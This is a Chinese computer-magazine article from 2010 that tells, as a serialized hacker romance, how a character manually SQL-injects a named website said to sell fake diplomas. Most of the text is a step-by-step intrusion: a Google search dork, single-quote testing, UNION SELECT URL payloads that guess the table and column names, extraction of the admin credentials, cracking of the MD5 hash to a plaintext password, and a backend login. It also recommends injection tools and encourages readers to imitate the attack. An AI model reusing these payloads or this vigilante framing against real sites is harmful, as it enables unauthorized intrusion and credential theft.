黑客实录(1)——手工入侵办假证网站

安全维护

2010年4月12日 第14期

黑客营Silic Group(第一纵队),聚集着一批热爱黑客技术的人,他们为正规网站寻找和修补安全漏洞,他们攻击恶意网站、非法网站,保护善良的网友。在本系列中,你将看到黑客如何灵活运用黑客技术,这些宝贵的经验可不是轻易就能获得的。除此之外,你还可以在文章中看到我们推荐的黑客工具,可以试试用工具降低模仿的难度。还等什么,快开始我们的学习之旅吧!

故事背景:三石哥和小小高中时是同桌,两人暗生情愫,三石哥痴迷黑客技术,小小为了三石哥特意学习黑客技术,可因为一个误会,两人都误解了对方的意思,高考结束后,两人分隔两地上大学,一个偶然的机会,小小与三石哥再度相遇……

黑客代号:三石哥

擅长技术:指定Web网站入侵

知识点:手工猜解数据库中的表段名和字段名,破解出网站管理员的账号和密码

“怎么会是他?”小小不敢相信眼前的事实,昔日的恋人三石哥如今成为黑客营Silic Group的队长,这让小小有点不知所措。原来,小小加入了国际黑客组织“新月联盟”,“新月联盟”第一高手、土耳其黑客领军人物Highlander有意与黑客营的高手切磋一下,派小小先去摸摸底。

小小抛开杂念,向三石哥发出了邀请信,如果他可以完成“新月联盟”指定的任务,Highlander将会与他切磋技艺。Highlander作为世界级的黑客,一直是三石哥想交往的,在接到邀请信后,三石哥立即杀向第一个任务——入侵某办假证的网站删除汇款网页,该网站是基于PHP架构的。

耗时的手工注入

三石哥在搜索引擎中输入关键字“Site:blackbap.org inurl:.php?id=”进行搜索,Site:blackbap.org的意思是仅在网站blackbap.org里面查找结果,inurl:.php?id=的意思是显示url里面含有.php?id=的内容。

三石哥从搜索结果中挑选的目标是blackbap.org/ paperlist.php?id=18,在数字“18”后面加单引号,网站返回错误信息(图1),表明blackbap.org/ paperlist.php?id=18就是一个注入点(加单引号的目的是为了验证网站是否对变量id进行了过滤,返回错误信息,表示未过滤)。

14-g08-01.jpg
图1

三石哥打开PHP注入工具ZBSI,将注入点放到程序里进行扫描(图2),发现该页面的字段数是11,表示新闻的标题、作者、时间等元素加起来总共有11个,其中“6 (免费下载,但请恰当引用)”有问题,这个就是突破口,可以通过猜解的方式获得管理员的用户名和密码。

14-g08-02.jpg
图2

三石哥进入页面:http://blackbap.org/paperlist.php?id=18/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/*,在地址后面添加“*/from/**/表段名”进行猜测。

如果猜错了,数据库就会发生错误,原来页面上的“6 (免费下载,但请恰当引用)”就会消失;如果猜对了,页面内容不会变化。常用的表段名是“admin”、“user”、“manage”、“login”、“master”、“guanli”。

这个办假文凭的网站没有使用常用的表段名,三石哥一无所获。就这样放弃?那怎么可以,三石哥可不是一个浅尝辄止的人,经过数小时的奋战访问http://blackbap.org/paperlist.php?id=18/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/**/from/**/blackbap_main_admin,久违的数字“6”再次出现在网页上。

表段名出来了,接着就是猜字段名了。多次尝试后,三石哥构造了http://blackbap.org/paperlist.php?id=18/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(username,0x5f,password),7,8,9,10,11/**/from/**/blackbap_main_admin,返回了结果“admin_9135d8523ad3da99d8a4eb83afac13d1 (免费下载,但请恰当引用)”。

管理员账号名称是admin,密码加密后的值是9135d8523ad3da99d8a4eb83

afac13d1,通过MD5在线破解网站得到密码rafael,三石哥点击网页最下面的“后台管理”,用管理员账号和密码登录了网站的后台(图3)。

14-g08-03.jpg
图3

剩下的事情就是找到汇款网页,删除这个邪恶的网页就完成第一个任务了。在网站后台,三石哥发现似乎此前有黑客进入过,还留了一串奇怪的字符“BD BB CF DF A3 AC D4 DA D2 BB”,这应该是一句话……

字符串代表的到底是什么?如果你猜到答案了,请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com,答对者将有机会获得我们送出的2GB防病毒闪存。三石哥下一个任务是什么?请看黑客实录(2)。

延伸阅读>>

上文中的黑客三石哥,用手工猜解的方式破解管理员账号和密码,难度比较高,需要有丰富的实战经验。普通的黑客一般是用黑客工具进行猜解的,例如啊D注入工具、明小子注入工具等(工具的具体使用方法请到数动连线安全板块查看),工具寻找到注入点,会自动尝试破解。用黑客工具的好处是方便、简单,但在复杂环境下,没有手工猜解那么有针对性。